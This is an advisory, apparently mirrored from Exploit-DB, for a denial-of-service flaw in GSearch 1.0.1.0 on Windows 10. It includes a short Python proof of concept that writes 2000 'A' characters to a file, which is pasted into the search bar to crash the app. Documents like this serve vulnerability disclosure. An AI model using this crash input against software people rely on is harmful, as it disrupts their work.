Vendor: GSearch
By: 0xB9
CVSS: 5.5 (MEDIUM)
CWE: Denial of Service
Product Name: GSearch
Affected Version From: 1.0.1.0
Affected Version To: 1.0.1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2019

GSearch v1.0.1.0 – Denial of Service (PoC)

GSearch version 1.0.1.0 is vulnerable to a denial of service: a specially crafted payload supplied to the application causes it to crash. The PoC payload is a string of 2000 "A" characters written to PoC.txt. The crash is triggered by copying the payload text from the generated PoC.txt file, pasting it into the application's search bar, and then clicking on any link.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, users are advised to avoid pasting arbitrary text into the search bar of the GSearch application.

Exploit-DB raw data:

# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
# Date: 6/23/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
# Version: 1.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# Click any link and app will crash


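# Payload: 2000 "A" characters
buffer = "A" * 2000
payload = buffer
try:
    # The context manager closes the file even if the write fails
    with open("PoC.txt", "w") as f:
        print("[+] Creating payload..")
        f.write(payload)
    print("[+] File created!")
except OSError:
    # Catch only file-system errors rather than using a bare except
    print("File cannot be created")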